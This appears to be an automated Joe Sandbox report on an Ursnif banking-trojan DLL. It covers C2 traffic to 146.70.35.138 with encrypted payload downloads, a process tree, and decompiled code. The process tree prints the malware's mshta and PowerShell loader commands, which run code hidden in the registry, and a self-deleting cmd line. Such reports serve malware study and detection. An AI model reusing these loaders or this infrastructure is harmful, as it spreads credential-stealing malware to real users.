3b 37 57 9d 83 86 72 e8 ac ff 51 7d 5b 56 f9 58 9b fc bd c3 ae 7f 17 f4 86 5d ac bf 83 30 cc a8 ac 1b 10 85 b4 67 38 3f 05 02 4b 10 c3 bc 6d cc 98 fe aa 9d fd 82 48 09 5f 6d c5 24 98 bc 1e 8d d0 32 3a be ba 5b cc 59 71 10 19 db f1 27 b4 18 19 51 81 c9 dc 2a 68 da d5 ca 34 87 4e 78 63 94 78 3a e6 ce 53 d9 88 10 f3 a7 80 63 78 a7 38 76 d7 18 61 67 78 00 29 51 09 8f 4c 89 4b ca 92 9c 13 7e 59 39 a0 51 aa fa d1 03 3b 4a 5f 67 d0 85 63 ea 30 6f 0d e8 09 ae 34 e7 8a 90 d9 95 4b fd 26 05 fb 0e 7c 02 b0 0c f9 67 df 98 0f 79 8c 6d ff 0c e7 be 6a b7 12 29 4d 0b 62 99 8f 98 67 62 02 8d b2 49 94 fa b5 be b0 ec 6a 9a af d8 30 7c aa 3f 85 d3 66 54 02 99 b6 98 bd be ce 73 8d 03 3f fe 89 4f 99 33 c1 d3 c5 bf fa 8b fb
                                        Data Ascii: Tg52 {@^Jb~NJa"f`Z2(~W>@pzh}*dwmLp3VXt" {{eQGPe#CHH+2W:xkkVvDr.}"l)[dsbE>`> jzYK&NzQAn[K!]z KQM/~t-VDW(czGMLrE"Pl'|/]|3`0tt,Fk<7#SA'od2Q-xh'"Zg8DU.f>i9]EGr_4lQykrn)J=eqy0f9_,[XE;Z\pCimK!_u#gvyQS1+Agy%buzZLhKf1+W"CHQ'V9pcQ)<Y4'a{D@^g!UCv(G!s"'MGp-Bmew)k:|PW4t*,E]-G6^\`[{:;7WrQ}[VX]0g8?KmH_m$2:[Yq'Q*h4Nxcx:Scx8vagx)QLK~Y9Q;J_gc0o4K&|gymj)MbgbIj0|?fTs?O3
                                        Apr 22, 2022 18:13:05.383399010 CEST1133OUTGET /phpadmin/4Tpxr1s1HGEszF_2B7LiF1/y3LyZZaJ3ZWvx/pZkSUF4R/1_2FbDyxYkCG6c7p_2FYkDR/nhEyt7WMzt/7hwk4OiHgD0JGJMFI/ImCZ8s_2FMqL/y0VwpZrsMmE/KWuRORcQBf9YTM/MqCUW1cFI9M0n3uMCAQqN/wZR88CWKfKsLYnKb/dLQvrxDU0Abjiwn/RIWbrb3190W9juPqlW/uvOHtDDn9/1QJUPhkqdx5oDn1fpwZB/wefwGHcoUJ1uL/B.src HTTP/1.1
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                        Host: 146.70.35.138
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Apr 22, 2022 18:13:05.762598991 CEST1147INHTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Fri, 22 Apr 2022 16:13:05 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1869
                                        Connection: keep-alive
                                        Pragma: public
                                        Accept-Ranges: bytes
                                        Expires: 0
                                        Cache-Control: must-revalidate, post-check=0, pre-check=0
                                        Content-Disposition: inline; filename="6262d411b019e.bin"
                                        Data Raw: 40 d1 e5 5a 8b c7 b4 20 04 1d ee a2 24 f1 96 9d 26 a1 0b 1b 7e e3 4e 1f 5d 3c 4d da 10 7c 95 81 0f 16 f7 ee 7d fb 39 8c 70 71 45 d9 0f ab ad 60 01 a5 32 5d be 0d 61 0e 50 82 f8 65 5b 9a 22 17 77 7e df 1d d3 e9 2a 08 c4 85 a2 d9 7c 2f 82 76 1f a1 0c 49 88 f8 0e c9 2d a0 8a 50 56 c2 c7 92 94 e2 ec 7e 79 4a 65 9b 26 e4 dd 72 cc a9 e7 63 18 5b ca dd df b9 3c ff 59 43 c8 9c c3 1a 12 d9 00 09 54 eb 65 b3 47 f4 68 0c b2 8f b5 20 fb 61 ad f0 29 d6 ef 6f ad 1f 9b 0f 56 f2 39 7e b4 2e 17 15 94 17 47 de 21 36 e1 25 3a 1c 1e 8d 36 93 c2 c8 4e 60 10 93 49 cd cf 19 4f 0c 1f a5 d3 5d df 25 13 ca 40 20 64 fe 4b 27 eb fb 5b ce 56 73 77 b6 d4 6f 61 c2 6b 4e fe cb 73 77 22 e9 f6 1d 48 0c 2e 7a d7 73 4c e6 51 80 cb f5 e3 20 5b 24 a3 68 83 38 6a 87 1d d6 fc d3 cf f2 a2 a3 35 f3 19 e8 ac 2c e4 cb 70 a5 b0 92 e2 87 00 7b 31 2a 0d 22 de b4 1e 6d 5d 7c 13 90 ef 11 74 34 aa 7e 6b 92 3a e5 d5 5c be 59 0b ec ab 8a db cf 67 a8 2b 63 24 50 a1 20 ed 30 f3 e8 e0 28 6b 51 f4 5e e9 8f c2 69 d8 28 69 51 46 a7 72 50 9d 2a 97 f7 91 81 7c 6c 5a d0 ba ac bd 1c d8 97 9e 7f 2d 30 0e 8b 0a c6 f9 a4 b5 dc 66 f3 19 b7 79 89 51 9b eb 95 fa e6 32 f7 db 83 04 be d0 a4 34 40 10 7b e0 ea 75 18 6e 32 43 93 ff ec 97 e9 13 de b1 39 90 ae fd b1 88 f6 eb a8 a3 5f d3 40 f2 8a c8 1a b5 da 23 07 28 14 d4 48 91 e4 75 6c 2e 2f 59 14 ed cd 56 33 a4 6f 3c 74 70 51 26 d2 f1 00 9d c7 9e 68 ca 93 01 b0 18 8b 9c 3a 19 27 47 cf c7 cc f2 d1 42 aa e5 ce 1f 0f 07 03 9a 24 72 37 bc 30 c3 42 3d 57 49 09 18 78 26 bc 66 1e 36 de 2a c7 72 0d 10 ee fa 93 05 a5 63 7e 1c e1 d8 c6 71 0e 0f 77 91 6d aa 79 b3 3a 27 fe 2e 3b 53 ad 84 37 f4 45 54 52 da 80 67 3c 9c 44 86 2a a7 58 26 94 83 b1 bd ca d7 ad 1d 43 f8 70 2b 43 d2 05 fd d2 bd 6b 6f 62 28 7b 75 60 c4 14 07 07 2c f7 3e f3 95 1f 56 90 0c 06 3e 6c 02 6c 89 e1 6c 0b cb a0 a3 9c ba 25 72 e8 31 27 75 22 9d 20 f7 46 af 10 5d c0 d6 ec 16 ab 36 03 82 9f fb a2 ca 77 e2 f1 69 ad fe a5 b9 2c 1b 4a e3 1d 69 43 fc 81 b7 22 57 f1 2c fa 72 4d 17 49 56 ad 1f ff 4a a5 38 50 c9 b2 68 b3 c4 e2 33 e0 9b 81 eb 69 56 89 c3 9b 32 9c 57 30 ee 5d 75 8b e2 b2 d7 ee fb a8 48 a0 5e f2 34 a7 15 38 ac ae 28 2c 60 6f 00 b8 12 2b bf 5a 7d fc 9d 1c f0 1a dd a6 92 7f f1 c5 f3 02 e2 83 f6 a1 52 db f7 14 b9 38 35 28 e6 2b 62 1a 3f b8 e0 b5 43 ea a8 92 b6 60 5b 95 b3 d5 09 19 61 54 a7 f6 67 69 2b 6d 9e 93 4e 6a 56 d6 3f 53 09 df 02 18 fe f4 5e 79 48 1e 9b 82 dc cf fb 80 f3 bb 65 a6 56 0e 5a e8 78 a7 13 70 ac ce cc c9 43 75 3c f7 ef 58 23 f8 c7 88 e3 17 85 ca 17 bb 6e 86 b2 4d 6f 8a da 5c 1b 90 9a d2 4d 26 35 99 bb 8b 29 ea 31 7b 6b 5f b9 0e 00 3a a4 e4 ea 72 09 48 da 0c d2 ae 7f 25 91 ec 37 59 6e 37 a1 80 7c 8e 19 d1 1d 3a ee dc 6d 6a 4c 0b 42 b6 2b 61 83 0b d7 d9 f5 f6 ce 72 f7 b5 90 05 e5 3f 8a 59 21 da ac 86 48 37 1f 98 8f 3a 7e a8 72 fb a7 30 f0 f0 02 05 b3 ae ea dd 01 b1 44 fd d2 ee a8 d7 98 54 14 92 eb 8f 4e 62 a3 f2 7e 80 f8 92 9d 71 a2 ed 5c 8a 7c f2 dd 5c 75 7c 65 29 cd 7c e2 5d aa 2d f2 1d f5 f7 ab 93 ec 3b 66 10 48 80 13 8e 53 aa 6d ca d6 5e d2 47 e2 a0 4b fe ca fd 03 fd fa 45 3e c5 74
                                        Data Ascii: @Z $&~N]<M|}9pqE`2]aPe["w~*|/vI-PV~yJe&rc[<YCTeGh a)oV9~.G!6%:6N`IO]%@ dK'[VswoakNsw"H.zsLQ [$h8j5,p{1*"m]|t4~k:\Yg+c$P 0(kQ^i(iQFrP*|lZ-0fyQ24@{un2C9_@#(Hul./YV3o<tpQ&h:'GB$r70B=WIx&f6*rc~qwmy:'.;S7ETRg<D*X&Cp+Ckob({u`,>V>lll%r1'u" F]6wi,JiC"W,rMIVJ8Ph3iV2W0]uH^48(,`o+Z}R85(+b?C`[aTgi+mNjV?S^yHeVZxpCu<X#nMo\M&5)1{k_:rH%7Yn7|:mjLB+ar?Y!H7:~r0DTNb~q\|\u|e)|]-;fHSm^GKE>t


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:18:11:58
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\loaddll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll"
                                        Imagebase:0x3c0000
                                        File size:116736 bytes
                                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:1
                                        Start time:18:11:59
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                                        Imagebase:0x1100000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:2
                                        Start time:18:12:00
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1
                                        Imagebase:0xb90000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.581908385.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535072965.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535101502.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.582808598.000000000504C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.581826169.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535038342.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.712190263.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.636315977.0000000006148000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534880441.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.535128040.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.534830912.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.581766632.000000000514A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Target ID:4
                                        Start time:18:12:03
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608
                                        Imagebase:0x1000000
                                        File size:434592 bytes
                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:7
                                        Start time:18:12:08
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 616
                                        Imagebase:0x1000000
                                        File size:434592 bytes
                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:9
                                        Start time:18:12:20
                                        Start date:22/04/2022
                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 652
                                        Imagebase:0x1000000
                                        File size:434592 bytes
                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:17
                                        Start time:18:13:10
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\mshta.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                                        Imagebase:0x7ff619ca0000
                                        File size:14848 bytes
                                        MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Target ID:18
                                        Start time:18:13:13
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                                        Imagebase:0x7ff619710000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.679719876.00000212B8CDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Target ID:19
                                        Start time:18:13:14
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:21
                                        Start time:18:13:29
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                                        Imagebase:0x7ff6eb830000
                                        File size:2739304 bytes
                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:22
                                        Start time:18:13:31
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\control.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\control.exe -h
                                        Imagebase:0x7ff7500b0000
                                        File size:117760 bytes
                                        MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000016.00000003.662858481.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000016.00000000.661182267.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000016.00000003.662961657.0000022D46E6C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000016.00000000.662297530.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                        General

                                        Target ID:23
                                        Start time:18:13:32
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP"
                                        Imagebase:0x7ff6eae70000
                                        File size:47280 bytes
                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:24
                                        Start time:18:13:43
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline
                                        Imagebase:0x7ff6eb830000
                                        File size:2739304 bytes
                                        MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET

                                        General

                                        Target ID:25
                                        Start time:18:13:45
                                        Start date:22/04/2022
                                        Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP"
                                        Imagebase:0x7ff6eae70000
                                        File size:47280 bytes
                                        MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:26
                                        Start time:18:13:47
                                        Start date:22/04/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff74fc70000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:27
                                        Start time:18:14:03
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll
                                        Imagebase:0x7ff602050000
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:28
                                        Start time:18:14:04
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff77f440000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:29
                                        Start time:18:14:05
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\PING.EXE
                                        Wow64 process (32bit):false
                                        Commandline:ping localhost -n 5
                                        Imagebase:0x7ff7b6c20000
                                        File size:21504 bytes
                                        MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:31
                                        Start time:18:14:27
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\RuntimeBroker.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                        Imagebase:0x7ff7b5d10000
                                        File size:99272 bytes
                                        MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:32
                                        Start time:18:14:53
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\rundll32.exe
                                        Wow64 process (32bit):
                                        Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                                        Imagebase:
                                        File size:69632 bytes
                                        MD5 hash:73C519F050C20580F8A62C849D49215A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Target ID:33
                                        Start time:18:15:30
                                        Start date:22/04/2022
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):
                                        Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1"
                                        Imagebase:
                                        File size:273920 bytes
                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        Disassembly

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:19.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:6
                                          Total number of Limit Nodes:0
                                          execution_graph 122 401700 GetNLSVersion 123 401731 122->123 124 401750 125 401764 124->125 126 401843 GetBinaryTypeW 125->126 127 40177c 125->127 126->127

                                          Callgraph

                                          Executed Functions

                                          Function 00401750 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 401750-401769 call 401078 3 40176b-40178f 0->3 4 40177c-401783 0->4 7 401791-401798 3->7 8 40176d-401778 3->8 6 4018b7-4018c1 4->6 7->6 8->7 9 40177a-40186f GetBinaryTypeW 8->9 13 401871-401878 9->13 14 401883-4018a3 9->14 13->6 15 4018a5-4018ac call 4010a0 14->15 16 40187a-401881 14->16 15->6 16->6
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.495519777.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.495511457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495713873.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495720767.000000000042D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495726963.0000000000432000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495738200.0000000000435000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495749392.000000000043E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495755515.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495938167.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495944033.0000000000482000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495954473.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495964036.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495981629.0000000000498000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                          Similarity
                                          • API ID: BinaryType
                                          • String ID:
                                          • API String ID: 3726996659-0
                                          • Opcode ID: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                          • Instruction ID: 0eeef9b5ff0b6f189b2643ab8443012d5bbcf05fbf81118edcc849a7d612c21c
                                          • Opcode Fuzzy Hash: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                          • Instruction Fuzzy Hash: 5F310AB4D043188BDB24DF64C8847ADBBB0AF55304F6081FAD819672E1D3799AC6DB4A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401700 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 20 401700-40172c GetNLSVersion 21 401731-401736 20->21 22 401747-40174e 21->22 23 401738 21->23 24 40173f-401746 22->24 23->24
                                          C-Code - Quality: 37%
                                          			E00401700() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _t7;
				intOrPtr _t9;
				intOrPtr* _t13;

				_t7 = _t13;
				 *((intOrPtr*)(_t7 + 8)) = 0;
				 *((intOrPtr*)(_t7 + 4)) = 0;
				 *_t7 = 0;
				_t9 =  *__imp__GetNLSVersion(); // executed
				_v12 = _t9;
				if(GetLastError() != 0x57) {
					_v8 = 1;
				} else {
					_v8 = 0;
				}
				return _v8;
			}








                                          0x00401706
                                          0x00401708
                                          0x0040170f
                                          0x00401716
                                          0x00401721
                                          0x0040172c
                                          0x00401736
                                          0x00401747
                                          0x00401738
                                          0x00401738
                                          0x00401738
                                          0x00401746

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.495519777.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.495511457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495713873.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495720767.000000000042D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495726963.0000000000432000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495738200.0000000000435000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495749392.000000000043E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495755515.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.495938167.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
